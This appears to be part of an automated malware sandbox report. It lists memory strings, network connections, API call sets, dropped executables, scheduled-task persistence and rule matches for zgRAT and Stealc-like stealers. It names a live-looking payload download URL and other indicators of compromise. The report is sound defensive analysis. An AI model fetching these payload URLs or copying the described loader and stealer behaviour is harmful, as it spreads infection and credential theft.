Source: RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id5Response
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id5ResponseD
Source: RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id6
Source: RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id6Response
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id6ResponseD
Source: RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id7
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003499000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id7Response
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003499000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id7ResponseD
Source: RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id8
Source: RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id8Response
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id8ResponseD
Source: RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id9
Source: RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id9Response
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003499000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tempuri.org/Entity/Id9ResponseD
Source: Amcache.hve.21.dr String found in binary or memory: http://upx.sf.net
Source: 66ed86be077bb_12.exe.27.dr String found in binary or memory: https://aka.ms/AA21ue1#ValidationVisitor
Source: gold.exe, 0000001F.00000002.2104172556.0000000003775000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2737248313.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ip.sb/ip
Source: axplong.exe, 0000001B.00000002.3771028122.00000000015F9000.00000004.00000020.00020000.00000000.sdmp, 66ed86be077bb_12.exe.27.dr String found in binary or memory: https://sectigo.com/CPS0
Source: 66ed86be077bb_12.exe.27.dr String found in binary or memory: https://tools.ietf.org/html/rfc4918#section-11.2chttps://tools.ietf.org/html/rfc7231#section-6.5.8ch
Source: axplong.exe, 0000001B.00000002.3769503003.0000000001494000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.leopardi.nl/
Source: axplong.exe, 0000001B.00000002.3769503003.0000000001494000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.leopardi.nl/-
Source: axplong.exe, 0000001B.00000002.3769503003.0000000001494000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.leopardi.nl/F
Source: axplong.exe, 0000001B.00000002.3769503003.0000000001494000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 0000001B.00000002.3771286465.0000000001623000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.leopardi.nl/frm/_vti_cnf/Blenar.exe
Source: axplong.exe, 0000001B.00000002.3769503003.0000000001494000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.leopardi.nl/frm/_vti_cnf/Blenar.exe-8
Source: axplong.exe, 0000001B.00000002.3769503003.0000000001494000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.leopardi.nl/frm/_vti_cnf/Blenar.exeC
Source: axplong.exe, 0000001B.00000002.3769503003.0000000001494000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.leopardi.nl/frm/_vti_cnf/Blenar.exeR8$
Source: axplong.exe, 0000001B.00000002.3769503003.0000000001494000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.leopardi.nl/frm/_vti_cnf/Blenar.exew8A
Source: axplong.exe, 0000001B.00000002.3769503003.0000000001494000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.leopardi.nl/frm/_vti_cnf/Blenar.exey
Source: 6dbb7bdf47.exe, 00000011.00000002.3766355636.0000000001038000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49931
Source: unknown Network traffic detected: HTTP traffic on port 49925 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49931 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49925
Source: unknown HTTPS traffic detected: 46.19.218.204:443 -> 192.168.2.7:49925 version: TLS 1.2
Source: unknown HTTPS traffic detected: 46.19.218.204:443 -> 192.168.2.7:49931 version: TLS 1.2
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E6EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 17_2_00E6EAFF
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E6ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 17_2_00E6ED6A
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E5AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput, 17_2_00E5AA57
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E89576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 17_2_00E89576
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Temp\Tmp1F00.tmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Temp\Tmp1F11.tmp

System Summary

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\penis[1].exe, type: DROPPED Matched rule: Detects zgRAT Author: ditekSHen
Source: crypted[1].exe.27.dr, MoveAngles.cs Large array initialization: MoveAngles: array initializer size 311296
Source: crypted.exe.27.dr, MoveAngles.cs Large array initialization: MoveAngles: array initializer size 311296
Source: 6dbb7bdf47.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: 6dbb7bdf47.exe, 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_146723aa-9
Source: 6dbb7bdf47.exe, 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_871ae693-8
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: skotes.exe.6.dr Static PE information: section name:
Source: skotes.exe.6.dr Static PE information: section name: .idata
Source: skotes.exe.6.dr Static PE information: section name:
Source: 3ec4738210.exe.11.dr Static PE information: section name:
Source: 3ec4738210.exe.11.dr Static PE information: section name: .rsrc
Source: 3ec4738210.exe.11.dr Static PE information: section name: .idata
Source: 3ec4738210.exe.11.dr Static PE information: section name:
Source: b74664dd7e.exe.11.dr Static PE information: section name:
Source: b74664dd7e.exe.11.dr Static PE information: section name: .rsrc
Source: b74664dd7e.exe.11.dr Static PE information: section name: .idata
Source: b74664dd7e.exe.11.dr Static PE information: section name:
Source: random[1].exe0.11.dr Static PE information: section name:
Source: random[1].exe0.11.dr Static PE information: section name: .idata
Source: random[1].exe0.11.dr Static PE information: section name:
Source: random[1].exe1.11.dr Static PE information: section name:
Source: random[1].exe1.11.dr Static PE information: section name: .rsrc
Source: random[1].exe1.11.dr Static PE information: section name: .idata
Source: random[1].exe1.11.dr Static PE information: section name:
Source: 610cd559ac.exe.11.dr Static PE information: section name:
Source: 610cd559ac.exe.11.dr Static PE information: section name: .idata
Source: 610cd559ac.exe.11.dr Static PE information: section name:
Source: axplong.exe.23.dr Static PE information: section name:
Source: axplong.exe.23.dr Static PE information: section name: .idata
Source: axplong.exe.23.dr Static PE information: section name:
Source: random[2].exe.27.dr Static PE information: section name:
Source: random[2].exe.27.dr Static PE information: section name: .rsrc
Source: random[2].exe.27.dr Static PE information: section name: .idata
Source: random[2].exe.27.dr Static PE information: section name:
Source: 4d72d15151.exe.27.dr Static PE information: section name:
Source: 4d72d15151.exe.27.dr Static PE information: section name: .rsrc
Source: 4d72d15151.exe.27.dr Static PE information: section name: .idata
Source: 4d72d15151.exe.27.dr Static PE information: section name:
Source: stealc_default2[1].exe.27.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: stealc_default2.exe.27.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E5D5EB: CreateFileW,DeviceIoControl,CloseHandle, 17_2_00E5D5EB
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E51201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 17_2_00E51201
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E5E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 17_2_00E5E8F6
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe File created: C:\Windows\Tasks\axplong.job
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_00DBE530 11_2_00DBE530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_00DF78BB 11_2_00DF78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_00DF7049 11_2_00DF7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_00DF8860 11_2_00DF8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_00DB4DE0 11_2_00DB4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_00DF31A8 11_2_00DF31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_00DF2D10 11_2_00DF2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_00DF779B 11_2_00DF779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_00DE7F36 11_2_00DE7F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_00DB4B30 11_2_00DB4B30
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00DFBF40 17_2_00DFBF40
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E62046 17_2_00E62046
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00DF8060 17_2_00DF8060
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E58298 17_2_00E58298
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E2E4FF 17_2_00E2E4FF
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E2676B 17_2_00E2676B
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E84873 17_2_00E84873
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00DFCAF0 17_2_00DFCAF0
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E1CAA0 17_2_00E1CAA0
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E0CC39 17_2_00E0CC39
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E26DD9 17_2_00E26DD9
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00DF91C0 17_2_00DF91C0
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E0B119 17_2_00E0B119
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E11394 17_2_00E11394
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E11706 17_2_00E11706
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E1781B 17_2_00E1781B
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E119B0 17_2_00E119B0
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E0997D 17_2_00E0997D
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00DF7920 17_2_00DF7920
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E17A4A 17_2_00E17A4A
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E17CA7 17_2_00E17CA7
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E11C77 17_2_00E11C77
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E29EEE 17_2_00E29EEE
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E7BE44 17_2_00E7BE44
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E11F32 17_2_00E11F32
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\acentric[1].exe 1ED4A8B4C74AAB435EA5CD459D5AC961E5A8CA28924801BD84D336135F30EFDE
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\crypted[1].exe 17AC37B4946539FA7FA68B12BD80946D340497A7971802B5848830AD99EA1E10
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: String function: 00DF9CB3 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: String function: 00E0F9F2 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: String function: 00E10A30 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7672 -s 1512
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\penis[1].exe, type: DROPPED Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: crypted[1].exe.27.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: crypted.exe.27.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: file.exe Static PE information: Section: ZLIB complexity 0.998073484332425
Source: file.exe Static PE information: Section: nkxohnek ZLIB complexity 0.9944936410956882
Source: skotes.exe.6.dr Static PE information: Section: ZLIB complexity 0.998073484332425
Source: skotes.exe.6.dr Static PE information: Section: nkxohnek ZLIB complexity 0.9944936410956882
Source: 3ec4738210.exe.11.dr Static PE information: Section: fcorzhao ZLIB complexity 0.9947172108493443
Source: b74664dd7e.exe.11.dr Static PE information: Section: fcorzhao ZLIB complexity 0.9947172108493443
Source: random[1].exe0.11.dr Static PE information: Section: ZLIB complexity 0.9973124574250681
Source: random[1].exe0.11.dr Static PE information: Section: qnrefdmv ZLIB complexity 0.9946357918838136
Source: random[1].exe1.11.dr Static PE information: Section: fcorzhao ZLIB complexity 0.9947172108493443
Source: 610cd559ac.exe.11.dr Static PE information: Section: ZLIB complexity 0.9973124574250681
Source: 610cd559ac.exe.11.dr Static PE information: Section: qnrefdmv ZLIB complexity 0.9946357918838136
Source: axplong.exe.23.dr Static PE information: Section: ZLIB complexity 0.9973124574250681
Source: axplong.exe.23.dr Static PE information: Section: qnrefdmv ZLIB complexity 0.9946357918838136
Source: random[2].exe.27.dr Static PE information: Section: fcorzhao ZLIB complexity 0.9947172108493443
Source: 4d72d15151.exe.27.dr Static PE information: Section: fcorzhao ZLIB complexity 0.9947172108493443
Source: skotes.exe.6.dr Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
